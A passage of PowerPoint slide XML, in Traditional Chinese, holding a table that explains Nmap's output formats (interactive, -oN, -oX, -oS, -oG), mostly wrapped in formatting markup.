                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3198533954"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="34290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dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>提供</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>種不同的輸出</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>格式    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>參考資料</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>https://nmap.org/man/zh/man-output.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0" smtClean="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TW" altLang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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7767107"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>默認的方式是</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>interactive output</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>，發送給標準輸出</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>stdout</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>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08246650"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="434340">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>oN</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>filespec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>標準輸出</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>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TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>normal output</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>方式類似於 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>interactive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>，但顯示較少的運行時間信息和告警信息，這是由於這些信息在掃描完成後使用於分析，而不是交互方式的</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1284794"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="434340">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>oX</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>filespec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>輸出</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>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tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>輸出是最重要的輸出類型，可被轉換成</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>HTML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>，對於程序處理非常方便，如用於</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>圖形用戶接口或導入數據庫。</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0937157"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>oS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>filespec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>（腳本 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>KIDD|3 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>輸出）</a:t>
                      </a:r>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2494562"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>oG</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>filespec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Grep</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>輸出</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
